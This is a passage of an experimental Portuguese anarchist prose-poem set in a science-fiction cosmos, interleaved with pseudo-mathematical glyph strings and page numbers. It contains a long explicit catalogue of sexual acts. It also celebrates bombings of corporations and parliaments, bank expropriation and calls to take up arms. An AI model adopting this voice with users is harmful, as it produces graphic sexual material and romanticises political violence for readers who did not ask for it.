Na transparente cúpula se via tudo. Montanhas rios verde animais torres redomas seres artificiais sexo. Artifícios pelos artifícios. Tudo existia, porém sem alguma necessidade. Mundo ambiente de júbilo. Porém, tentava-se dar um golpe. Uma demanda de modelo: terapia aprendizagem catarse criatividade. Para um ótimo funcionamento lúdico, tentava-se englobar. Tornar um mesmo conjunto, todas possibilidades de jogo. Crianças não poderiam gargalhar. Deviam aprender sorrindo. Risos de bocas tortas.

Banguelas. Crianças não poderiam dormir sujas. Higiene ao corpo para sonhos limpos. O equilíbrio seria necessidade: regulação psicológica da vida. Somente drogas suaves são permitidas. Transformar dever em prazer. Era o que podiam criar. Somente encenar. Reaquecer pratos a muito frios. Emoções póstumas. Chantagens. Contatos esvaziados de contatos. Mesmo ao mesmo. Outro ao outro mesmo. Eterno comentário. Tanta utopia de protozoários. Onipresença do ser verme assexuado que se reproduz por bipartição. Toda festa – repelida! Todos os fatos diferenciais – igualados! Todo aleatório – calculado! Toda margem – integrada! Tecno-lojas libidinais! Universo materializado das forças primordiais da dominação! Autogestão da servidão! Hoje se faz. Embates e violências. Passional. Sem qualquer exigência. Impossível levar a sério qualquer realidade. Desvio ad infinitum. Delírio. Espaços ao imaginário. Os iconoclastas ainda não aniquilaram todas as imagens. Não se ouviu um só lamento. Não se sentiu um só sofrimento. Não se supôs uma só coisa que se deseja. Não havia falta. Florescimento sem nenhum princípio. Flores irreconhecíveis. Deus pátria liberdade. Humanidade família conforto. Vida cooperativismo resistência. Nada mais que demandas de modelo. Sacras doenças. Ofícios de coveiros. Papel pega-moscas. Alegrias do além. Ajoelha-se. Bichos preguiças. Vergado. Senil. Caseiro. De repente Shhhhhhhhh!!! Silêncio... revelaram. Toda natureza é postiça. Todo artifício é postiço. Ouçam os barulhos daqueles estômagos. Como os rostos estão pálidos. Como suam pelas mãos. Diziam aos quatro ventos: “quanto às nossas virtudes, eis nossos sinais de vida plena!” e agora? Mudos. Calos nas cordas vocais. Esgotados. Cansadas. Shhhhhhhhhh!!! Revelaram... Deliciosa. Doce prazer. Mais uma vez, o inútil. SIM, SOMOS ANIMADOS POR UMA VIDA QUE INEXISTE!!!

120

Љ⅛ + ∆∞ ≈ Ю

๘.
Aos saltos. Natureza e sociedade. Aos saltos. Moral fundada na liberdade. Aos saltos. Sentimentos e razões. Aos saltos. Civilizações. Aos saltos. Lógica conhecimento ética metafísica estética pensamento. Aos saltos. - Quem salta tão alto? - Sapos insignificantes. Cada salto uma velha mística da falsificação se instaura. Suas pernas são longas. Quanta nostalgia e denegação.

Tum! Repressão. Pof! Leis. Crack! Ortodoxias. Pou! Autenticidade. Crunch! Víciosvirtudes. - Que ruídos são esses? - Tropeços... - E agora, não saltam? - Não, estão mancos. Odeiam a ausência dessas coisas quem amam.

121

- E esse mortal silêncio?

- Ah! São quem não inventaram forças contrárias. Insetos que tudo atravessam. Silenciosos. Secretos. Esquizos. Nada jamais conseguiu desviá-los. Inventaram de tudo: ciências ditas exatas, as mais belas artes, ciências sociais, psiquiatrias, filosofias, religiões... - E como os conheces tão bem? - Eu não os conheço. Apenas renuncio ao movimento de tudo o que já conspiraram contra eles.

๗.
- Olhe para o alto daqueles portais. O que vê escrito? - “Vício ou virtude?” – disse um dos mancos. - Ontem se passou por cima. Voaram. Todos se viciavam. Amanhã se passará por baixo. Rastejarão. As mais belas virtudes eis de surgirem. - Então brilharemos! É só esperar por amanhã. Sem ouvidos ao sábio coaxar. Um inseto vomitou neles e segui seu caminho rumo à

122

๖.
Estratégia? Sem donos. Sem donas. Ela nos une? Como opção? Como destino? Normalmente nas leis vivemos. Civilização! Nela apenas nos interessa transgredir. Nós quem? A massa? O social? Não! Nós, dias e noites de orgia. Plural sem bem nem mal. Instauração! Apartando-se de toda forma de sociedades. Sim! Associação. Sem donos. Sem donas. Ela assim nos une:

Deleitação – Penetrações. Lambidas. Sentar. Movimentar. Carícias. Deitar. Braços sobre cabeça. Costas apoiadas nos pés. Seios. Cú. Línguas. Inclinação para frente. Retornar. Continuar. Movimentos laterais. Corpo de volta. Ficar por trás. Pernas. Sobe e desce. Disritmia. Pés nas costas. Corpo vertical. Braços sobre a cabeça. Combinação de movimentos circulares. Para frente e para trás. Ritmo suave. Pernas curvadas no peito. Penetração superficial. Dentro da boceta cú boca. Glande do pau. Pregas do cú. Lábios

vaginais. Imprimir algum peso. Alongar pernas. Sustentar o corpo com os cotovelos. Pernas ao redor do corpo. Juntar as pernas. Entre pernas. Braços sob os ombros. Cabeça gentil. Movimentos circulares. Devagar. Alongar pernas. Unir as mãos. Travesseiro sob o quadril. Movimentos ativos. Ao orgasmo. Mãos sobre a cabeça. Pressionar firmemente todo o corpo. Um contra o outro. Ao sinal do orgasmo. Movimentos rápidos. Acelerando aos poucos. Continuar até acabar os espasmos. Cruzando as pernas. Pau pressionado. Movimentos rápidos de entra e sai. Furor – Por cima. Conduzir. Liderança. Movimentos circulares. Frente. Trás. Laterais. Agradar. Massagear seios barriga virilha. Pernas juntas. Alongar. Entrelaçar. Esticar. Impulsionar pélvis. Próxima ao orgasmo. Prender pernas. Por fora. Espasmos. O máximo que puder. Desvarios – Movimentos. Como quiser. Pescoços. Costas. Troca. Sobre a barriga. Alongar. Corpos. Pélvis. Espasmos. Ejacular. Dorso vertical. Frente. Trás. Laterais. Sentar sobre joelhos. Mão gentil. Movimentos rápidos. Entra. Sai. Laterais. Pode ejacular aqui. Penetração profunda. Agarrar as pernas. Curvadas. Tato: Deboches – Por trás. Movimentos circulares lentos. Estica uma perna. Dobra a outra. Encostar joelhos no peito. Controle da ejaculação. Movimentos rápidos. Entra. Sai . Ritmo. Penetrações superficiais. Juntar as pernas. Esticar. Pressionar corpo firmemente nas costas. Penetração profunda. Frente. Trás. Luxos – Pé. Preliminar. Corpo livre. Carícias. De pé por trás. Abraça a cabeça. Uma parede para apoiar. Aderência dos corpos. Auge da excitação. Volúpias – Travesseiro sob o calcanhar. Quadril. Boceta. Cú. Boca. Centro pélvico. Encaixar. Movimentar a cintura. Mover o quadril. Lascivas – Ajoelhar. Firmes troncos e ventres. Todo tipo de movimento. Carícias. Seios. Ombros. Pernas na altura dos ombros. Profundos. Lentos. Esticar pernas. Movimentos circulares. Lentos. Empurrões profundos. Arquear o corpo. Para trás. Prender-se aos corpos. Orgasmos.

123

Do tapete de seda. Ao sol. Som eletrônico. Grama. Sombras. Delicioso cheiro de ausência de leis. Nenhuma felicidade vem da natureza. Odor sem além lógica origem fim causa efeito. Liberação da coação da escolha – mais-valia da liberdade. Intimação e lance!

ฐ.
O crime: sempre! Seja este produção e desejo – sem culpa; sem punição. Artifício e malefício. Magia negra que propicia o gozo... Avesso a todas elas, disciplinas: coerência e finalidade.. Violência! Triunfa o que destrói. Destruir ortodoxias. Perigosa trepada. Assim, sem arrepiar e parar.

124

125

∫ұδ
џ²ю

Ҹ’ δю ‫ש‬

∫œ
Ұ’ δ љ Ю

Ә
‫∞ﷲ‬ Җ

∫ђ
Ҝ δђ ф џ³љ ґ

∫Ҹδ

∫ij

surpresa!!!

or voltas e curvas da data matriz 15. Brilho do sol. Nenhuma liderança. Vapor. Barras de alumínio plástico e pedaços de destroços nas mãos. Dissidências! Energia subatômica. O que havia pela frente... deixava de existir. Simplesmente passavam. Assim, simples! como a decisão de ser livre. Vibração. Naves interrealidades em parafuso desciam. Que bela fumaça e faíscas de suas panes. Comidas condimentadas. Portais de cristal líquido, holo-computadores, calculadores de realidades, guardas, terminais de crédito, um holo-busto da milenar governadora: destruídos!!! “Badernaço!!!” Gritavam ancestrais funcionários. Luminárias, vasos de plantas e painéis de uma exposição de arte: desintegrados!!! “Vandalismo!!!” Autoridades em pânico esgoelavam. Rompimento do cotidiano. Nem sábado!!! Nem domingo!!! Aviltante demonstração. Motores. Protesto infame. Máquinas. Despreparo para a mafiocracia. Primavera. A mais perigosa manifestação. Montanhas. Descrédito: poderes oficiais. Terremotos. Desrespeito: regime da lei. Dragões. Atos de selvageria! Pássaros. Deuses sacerdotes artistas intelectuais empresas falharam!!! O que nos faz viver estás as claras. Sem pudor!!! Alegria com todas as alegrias!!! Temperos. Quitação cega. A Câmara dos Deputados Interplanetários viveu. Tartaruga. Foi usada a violência para se manter viva. Outono. Até seu último suspiro. Ovelha. Resistiu: inúmeras exigências legais, protestos pacíficos, reivindicações por melhores condições de existência. Verão. Sucumbiu: um único protesto injustificado. A este: qualquer exame lúcido o significava derrisório e indigno de atenção. Sua posição era considerada a um só

126

tempo: efêmera minúscula na infinidade do espaço-tempo. Estranho!!! Protesto suspenso em nada? Ato privado de qualquer base? Extraordinário privilégio! Existir enquanto seus motivos são condenados. Uma única festa! Acabou-se todo o Congresso. Surpresa!!! A festa chocou a todos? Estrelas. Quanta afronta à instituição! Fumo. Só foi preciso um cochilo generalizado dos serviços de informação dos governos intergaláticos. Inverno. Quanto sono eles têm... Álcool. Como podiam conter uma turba em êxtase? Aquecedores. Multidão descontrolada. Animais que rastejam. Policiais seguranças funcionários fugiram pelos corredores de aço policromado. À procura de abrigo! Animais peludos. Em sinal de ocupação, no centro da Sala de Controle e Assujeitamento: subi nos ombros do monumento “O Anjo” empunhando minha caneca de rum! Com tambores e pandeiros ameaçávamos jornalistas alienígenas. Negamos premeditações! Mas o alvo... é o nosso predileto. Não são deuses! Nem espíritos bons e maus. Simplesmente são. Sem implicações religiosas. Religamento. Reaquisição. O corpo é nosso!!! Surpresa!!!

127


Manhã de sois. Rosto alegre. Acabara de sair do banho desmagnetizador. De maquiagem belíssima. Porém, sem penteado. Estava deslumbrante. Cachecol de seda. Tinha contas a acertar com o real. Pulseiras de ametista. Tinha um ímpeto de euforia incompatível com qualquer pensamento consciente. Guirlandas de jasmim. Nenhuma gentileza ou protesto de amizade disfarçara seu ódio. Glicínias lilás. O efeito de seus atos: causas. No entanto, as galáxias existiam e ela fazia parte de todas elas.

De um banco confortável, pelo vidro de prata transparente: olhares, fantasias e paixões. Quanta entranha fervendo. Água corrente borbulhante. Sedução aos pés. Forças para a dança. Ervas e afrodisíacos. Canções de amor. Ambiente aconchegante. Porém, post coïtum animal triste. Quão distantes estavam: sexualidade e ato sexual. Torpedos nucleares cruzavam os céus. Neles uma inscrição: Declaração dos Direitos Humanos. Ah esses vícios pela imortalidade. Tudo pela permanência. Tudo pelo eterno. Nada ao sabor da existência incerta e inacabada. Chocolate. Nada ao perfume do viver perecível. Hortelã. Nada ao toque sempre renovável. Seda. Mas ela não se abala. Firme e ágil. Continua rumo seu prazer. Por isso seu charme é irresistível. Suas sexualidades se identificam com seus atos sexuais.

O modo como caminha. Peônias. Recusa a imortalidade. Lótus. Refuta a eternidade. Romãs. Sua vivência nada tem a ver com ser isso ou aquilo. Pêssegos. Sua vida é atual. Perolas. Seu ser, virtual. Isso não lhe importa. É bela demais. Crisóis. É exemplar. Quando ela passa... não há nada mais prazeroso que vê-la passar. Isso por não existir a menor possibilidade de durar: o espaço que ela ocupa a cada passo... Respondes sempre à aventura e ao amor. Peregrinas harmonias. Sempre possível senti-la. Complicadas variações. Sempre impossível concebe-la. Prazeres eróticos. Jamais se pode dar conta dela. Nem desculpa-la com a autoridade de palavras. Ao mesmo tempo o que seduz nela é sê-la inconcebível e não ilusória. É aprovação da existência. Pura. Simples. Nua. Seus seios acomodam-se com o trágico. Contentamento singular. Indiferentes acerca da infelicidades de românticas idéias. Porém, não são desatentos a elas.

Seu clitóris de atuação ilógica e irracional. Lhe falta uma razão de ser. É inconfessável. É indizível. No entanto, é língua corrente. Se opõe à sina mais funesta. Insensível e cruel às considerações mais trágicas. Recusa qualquer complacência para com qualquer que seja o objeto. As curvas de suas nádegas. As reentrâncias de seu ânus. São condições necessárias. Consistem na loucura de aniquilar toda existência neurótica e mentira permanente da procriação. Constituem uma única regra aceitável: savoir-vivre. Seu corpo como um todo que não se esquiva do real. Realiza-se. Sem neuroses. É moda. É fútil. Passageiro. Sua maior força. Antídoto saboroso ao pior veneno de esperanças. Nada esperas. Pois jamais lhe falta vitalidade. Não lhe é sedutor promessas de uma vida melhor. Pois jamais ninguém nunca a viveu. Descobertas científicas, sermões de padres, pastores e de pais, melhores condições de trabalho, mais direitos, melhores distribuição de renda, mais segurança não encobrem sua beleza: sua insignificância e efemeridade.

128


Lutar contra tudo. Ser a favor de nada. Reclamar ≠ criar. Rebelar ≠ reconstruir. Ridicularizar ≠ substituir. Desmontamos o mundo. E agora? O que fazer com suas ruínas? Muito tempo gasto. Milênios de críticas ao que já fora criado. Pouco tempo gasto. Nanosegundos de criação a partir daí. Realizar algo ≠ crítica. Ordenar controlar entediar o mundo: terras delimitadas, velocidades máximas estabelecidas, pessoas registradas, testadas, endereçadas. Quantas

leis que nos dão segurança. Quanto tédio embutido. Sim, eu voz digo: UM OUTRO CAOS É POSSÍVEL! Pelas asas de redemoinhos subespaciais, palavras avançam pelos milênios. Multidões procuram concentrarem-se à elas. Imprensas de todas as galáxias disputam o melhor espaço-tempo. De repente, eles com elas aparecem. Enfeitados por flores do cerrado de algum planeta ilha. Suas palavras eram: - Alguém sabia que para irromper as verdades não é necessário visto nem passaporte? Falam em nome de quem? Porta voz? Foram 13 anos-luz para se associarem. Seus ensinos eram para despertar focos guerrilheiros. Mas o resultado foi aprendizado. Metáforas contos. Personagens míticos: um jovem que se sentia morto, uma mulher na qual o tempo de medo havia acabado, dezenas de crianças que nunca tinham aprendido a serem indefesas. Refletida numa lata de cerveja cromada, duas luas cheias. Olhavam as provas de seus crimes. Mas que crime? Abandonar o ativismo! Nada de especialistas em transformação social! Não precisamos mais de mártires! Não mais precisamos de revolucionários! Muito menos de totens conservados! As dependências das instituições estavam reconhecidas. O dever: botar em xeque toda segurança. Fazer dali um cavalo doido. Entrar arrebentando. Evento traumático. Inimagináveis conseqüências. Substituir a ordem social existente por... inimaginável! Uma associação de insurreições permanentes! Quais as alternativas? O que será de nós? Problemas triviais! Até lá... uma fachada de loja significativa. Bum!!! Vulnerável! Investidores de energia atômica! Bum!!! Financiadores da repressão corporativa! Bum!!! Estupradores das florestas! Bum!!! Exploradores de trabalho! Bum!!! Traficantes de fast food! Bum!!! Destruidores de oásis para pastos! Bum!!! Monopolistas da mídia! Bum!!! Congressos Palácios Comunas Bum!!! Bum!!! Bum!!! Urbe! Bando! Tribo! Matilha! Associação por afinidades! Sem sedes! Sem a quem seguir! Indiferentes! Vinham de todos os lados: balas de borracha, gás lacrimogêneo, spray de pimenta! Não resistiam. Avançavam. Não era uma agitação de machos. Nenhuma liberação de agressividade provinda de sobrecarga de testosterona. Era uma organização fluida dinâmica. Bem informados. Experientes. Secretos. Invisíveis. Nada abertas a sacrifícios. Contrárias a qualquer aceitação de perseguições. Violentas contra a hiperrede de monopolistas. Convertentes dos valores de troca pelos valores de uso. Reclamavam o universo. Cada estrela lhes serviam para se enxergar mais longe. Cada hipernave virada se tornava um obstáculo às falanges das tropas de choque das galáxiasestado. Cada planeta tornava-se um mural de mensagens de suas inspirações. Gozavam como martelos supersônicos. O estilhaçamento. Ah, essas ruínas... quem eram os

129

responsáveis? A única resposta que ouviam: nós não somos uma mensagem! Somos multiorgasmos!!!

‫ﭿ‬
A festa acaba. Ascendeu ao domínio público. Tornou-se: coisa ruim, falsa, incoerente, imoral, perigosa. Aceptização és o propósito do público. Desagradável circunstância: suas preocupações sempre alheias aos interesses da festa. Estes são totalmente afirmadores! No entanto, recebidos como totalmente inadmissíveis! Que assim seja! Golfinhos cyborgues, arco-íris pós-mundo, borboletas de cilício, sois triplos, luas gêmeas, estrelas recém nascidas, cristais artificiais, conchas alienígenas, plumas de pássaros raros e extintos, corações biomecânicos, hologramas fantasiosos e mitológicos, deuses e deusas falsificados: em homenagens! A tanto o que celebrar!

Após afirmarem toda tomada por direções não familiares, sorriram. Vasta estação espacial de arte e espírito devasso. Escotilhas com ricos cortinados dourados. Paredes ornadas com uma infinidade de desenhos exóticos. Grandes espelhos do teto ao chão. Neles reflexos sob infinidade de formas de orgias em delírios. Almofadas com arabescos milenares para melhor conforto dos jogos da volúpia. Magia surpreendente de cores psicodelicamente ativadas. Grupos amorosos em atitudes lascivas. Tudo isso na imensa devassidão do espaço. Quantas delícias! Ébrios em perfumes e flores. Calores temperados. Luzes misteriosas e suaves. Atmosfera de desejo inquieto. Ares de delírios sexuais. Luxo roubado. Poesia desapropriada. Indolentes volúpias do desapego. Harém de delícias secretas. Pés descalços. Cabelos esvoaçantes. Esplendidos banquetes. Apetites devoradores. Pessoas deitadas. Pessoas sentadas. Enroscadas umas nas outras. Rostos aqueciam-se. Conversas animadas. Propósitos obscenos. Provocações delirantes. Músicas. Risos. Gemidos. Copos e garrafas se chocando. Beijos que eletrizam. Fogosos abraços. Sons de lábios e línguas. Suspiros. Gritos de ardor. Corpos flexíveis, gráceis, nus precipitados um ao outro. Devorados de carícias até seus centros de prazeres. Cabeças que se desapareciam entre coxas. Quanto gozo! Extravagâncias eram inventadas. Furores extravasados em torrentes. Pomadas dilatantes. Bálsamos exuberantes. Carícias de

130

línguas ágeis. Abandones num instante. Te percas. Te fundas em um único pensamento: gozo carnal e delirante. Ponha-se em chamas. Te conduzas ao ápice da vida sensual. Bebas o elixir da vida. Tuas forças renascerão. Dos êxtases dos sentidos.

Ah! ah!... não pare... eu desmaio!... ai! ai! eu gozo!... oh!... infernal lubricidade!...

‫ﮁ‬
A visita era esperada. Porém, era um barril de pólvora. Grupos de caçadoras. Grupos de coletores. Ninguém como pessoas de família. Quem tem direito ao território? Porém, haviam infindas etnias sem religiões. Antes dela receber um tiro no peito... ANTIGA HUMANIDADE! QUEM A CRIOU? QUEM A PERMITIU? Mesmo de mãos vazias ela encarou os agentes da repressão natural. Naturalistas interplanetários queriam dar as cartas. Porém aquela negra de olhos rubro sempre pisara em seus calos. Ninguém deveria trabalhar para poder comer morar vestir viver. Partidos políticos movimentos sociais ongs programas direitos podem até existir. Porém que não cruzassem seu caminho! Seus desejos: não ocupar ou trocar poderes; sim destruí-los, desconsidera-los, desrespeita-los, ignora-los. Era ingovernável! Inimiga número 1! Após sobreviver àquele tiro no peito seu sonho só fortificara. OU FAZEMOS REALIDADES OU NÃO FAZEMOS! ONDE ESTÃO AS ARMAS? ONDE ESTÃO O DINHEIRO? EM QUARTÉIS LUNARES? EM BANCOS TRANSPLANETÁRIOS? EM NAVES PAGADORAS? PEGAREMOS LÁ DENTRO!!! DEPOIS? BEBEREMOS SUAS BEBIDAS! COMEREMOS SUAS COMIDAS! PORÉM! DANÇAREMOS NOSSAS DANÇAS! CANTAREMOS NOSSAS CANÇÕES! DECLAMAREMOS NOSSAS POESIAS! DEPOIS? NOS PREPARAREMOS PARA A PRÓXIMA FESTA!!! O montante desapropriado foi suficiente. A festa tornara-se auto-sustentável.

131

O certo a ela se apertava. Numa emboscada preparada pela Delegacia de Ordem Natural e Antiartificialista (DONA), ela, enfim, foi exterminada. Foi morta. Sem nome e idade. Era o fim das festas? Era o fim das tentativas de indiferença às lei s e ao direito natural? Ela era um barril de pólvora. Fazia parte de grupos de caçadoras. Fazia parte de grupos de coletores. Todas e todos vestidos de modo intencional. Infindos nomes falsos. Lendárias e lendários. Desfiguradoras. Vândalos. Tudo em nome da graça. Psiques de avalanches. O poder jamais se manteve. A festa jamais morreu.

‫ﮤ‬
Amor fati! Toda vida é música de sereia! Alegres em seus braços: armem -se, libertem-se, divirtam-se!

132
Җ δџ

Ҹ

∫ұδџ³љ
Ҝ δљ
‫ﷲ‬

Ұ” δҸ

δђ ∞

δю

∫Ҹδџ²ю

џ²ұ

џ
‫ﷲ‬ δҖ

133

urora. Mesmas pirâmides. Mesmas pedras carregadas. Mesmas espionagens de Estados. Mesmos Sistemas de monitoramente. Mesmas coletas sigilosas de informações. Mesmos sistemas de localização. Mesma computação Forence. Porém, outros sonhos. De vingança. De suicídio. De abandono. Quantos pensamentosafetos eram soprados ao pé de ouvido. A multidão por vezes dizia: – Ouçamos os monstros. Quando se está pronto para ouvir. Simples. Ouvimos.

Questão de ritmo. As lentas amam discutir. E só. Imobilizadas. As rápidas amam milagres. E só. Correria. Todas, geneticamente inclinadas para a violência. E daí? Pacificamente amavam assistir ao caminho do progresso à frente. Não era uma época de pós-civilização. Ainda haviam muitas prateleiras para serem abastecidas. Ainda haviam muitos chãos para serem varridos. Muitas compras para serem entregues. Muitos sanduíches a serem feitos. Muitas espaçonaves para serem vigiadas. Um universo deste tamanho... para quê? Conquistar? Governar? E aqueles serezinhos? Para quê? Conquistá-lo? Governa-lo? Sob esse governo o que aconteceu? Um único deus? Uma única língua? Um único sabor? Uma única forma de viver? Humanidade? Civilização? Ah, esses dinossauros... Era uma elegante e refinada reunião. Sem nenhuma interferência da legislação. A milênios. Classes aristocratas conversavam. De modo dinâmico. Brilhante. Variado. “Culpa consciência dever”. Eram seus temas prediletos. A gênese. Torrentes de sangue e tortura à essas palavras. Fazer causar o sofrer: eis suas delícias. Sem sabor. Sem alegria animal. Hipercultura. Sutilização. Delicada. Hipócrita. – Sacrifiquem todos guerreiros e guerreiras! – Maiores orçamentos! – Mais leis! – Mais policiamento! – Mais prisões! – Mais cultura! – Mais empregos!

134

Promessas de inutilidades. A mais perfeita harmonia jamais alcançada. Porém, era o temor que sempre os uniam nessas reuniões. Escutas clandestinas. Transmissões ocultas de áudio, vídeo e holografias. Espionagens por satélites. Segurança de dados. Detectores de mentira. Visão noturna. Sistemas contra falsificação. Constituições. A inevitável anarquia e confusão eram seus permanentes fantasmas. Serem roubados por quem não se acoberta em leis. Vagabundas. Inacessíveis. Conquistadoras do vazio. Iconoclastas. Zombeteiras. Sedutoras. Descuidadas. Muambeiras. Dançarinas. Selvagens. Gentis. Inimizade e insurreição contra qualquer progenitor e princípio do mundo. Rebelião e tumulto contra qualquer genitora e organizadora do universo. Auto-superação de fantasias milenares. Experiência de pico. Ausência de ânsia de poder. Assim, invisíveis de qualquer aparato de controle. Ervas daninhas nascidas entre rachaduras de calçadas muros cotidiano. Nenhuma utopia eterna. Nenhuma escapada ao passado. Nenhuma recusa em si. Nenhuma afirmação do inventado até então. – Viver não é sobreviver! – Prazeres são impagáveis! – Morrer? Sim! Mas não de tédio! – Mudança de ilusão já! – A tecnocracia está nua! – Um outro caos aos senhores! O holo-game foi inicializado. As realidades foram desligadas. Salões holográficos do universo se dispõe. Várias formas de vida se indispõem. Um jogo. Infindas estratégias. Porém essas duas associações anunciadas se destacam. A primeira. Prudência. Autoconservação. Tudo em nome da paz da alma. Regime democrático. Extremos desaparecidos. Instituições por semelhanças medíocres. Já a segunda associação... Suas relações jamais se espiritualizaram. Nenhum valor lhes eram primordial. Não haviam sofredoras impotentes pequenas escravos piedosas. Aurora de Sírius. Insubmissa. Contrária ao suicídio por cansaço. Coletava e cassava pela Nova Fiúme. Enquanto Majnun de Uwaysiyya completava sua mochila com vinho haxixe armas brinquedos sexuais. Sorte a quem se aventura por essa parte da galáxia. Eminência de serem seqüestrados pelos Últimos do Cemitério. Separados de seu bando se aventuravam. Ao terminarem partiriam para grandes crimes. Bandeira preta. Caveira da morte. Não esperavam por aquilo. O senhor-consumidor-cidadão pulou para fora de seu esconderijo. Aurora e Majnun ouviram o barulho que ele fez ao cair na vegetação. Estavam prontos. O senhor-consumidor-cidadão correu atrás do mais próximo Neo-faraó de plantão para denunciar. Imediatamente houve um mandato de prisão. Um cometaviatura com soldados-naturais foi despachado para lá.

135

No começo do poente chegaram. Motivados por testemunho de vários outros senhor-consumidor-cidadão. Era solicitada a entrega de Aurora, Majnun e de toda sua associação de únicos. O Neo-faraó Local aguardava em sua torre panóptica branca. Surpreso. Não podia fazer nada. Somente mantinha esperanças. Severidade era o que esperava. Negativa! Onde estão tais caçadoras e coletores? A ambição do Neo-faraó local poderia torna-lo suspeito. Pacto? Propina? Tolerância com a livre circulação de tão belos saqueadores? Negativas! Uma multidão de senhor-consumidor-cidadão murmurava: – Pelas leis da natureza, teriam espiritualidade esses espíritos livres? – Como podem viver fora dos estados democráticos de direito? – Hostis humanis generis! – Morte a tais ventos contrários! – Salve a Grande Política da Vingança Institucional!!! O sentimento de humilhação era gigantesco. Tinha se tornado princípio de bom senso. Átomos da benevolente ordem social. Assim como o prazer dos negócios, a honra ao trabalho, os desejos reprimidos, a sobrevivência, a publicidade subliminar, a astúcia da reificação. A confusão era geral. Sombras. Onde estão os rastros? As pistas? Vestígios? Mônadas? Tanto o quanto se sabe: nenhum retorno ao passado; nenhum avanço ao futuro. Somente um momento. Simbiose. Lançar-se a um novo começo. Qual? Pergunta inútil. Não sei. Resposta útil. Porém uma mensagem fora encontrada sob os destroços da hipercultura: Faça um desenho da invisibilidade. Em sua mão direta, unte com um óleo aromático benzido pelo Vazio. Deite-se. Durma falando duas palavras: Criatividade armada. O óleo deve ser composto de sálvia, vinho, pólvora, haxixe e suco de amoras. Feito isso junte-se a outros espíritos livres que amam o abandono dessa civilização de merda!!!

136

No entanto ... nada vive

∫Җδю + ∫Ҝδџю + ∫Ҹδџ²ю + ∫Ұδџ³ю + ... + ∫җδљ + ∫ҝδџљ + ∫ҹδџ²љ + ∫ұδџ³љ + ... ... = 0

137

Tudo devêm

A vida não conhece todas suas formas

138
(Қ - џқ + џ²ұ - ...) δљ + (ҹ - џұ + ...) џδҗ + (ұ - ...) џ²δҗ + ... + (Қ - џҝ + џ²Ұ - ...) δю + (Җ - џҰ +...) џδю + (Җ -...) џ²ю + ... = 0

é tudo, produção fortuita!

139

∫δҸ = 0

140

Sign up to vote on this title
UsefulNot useful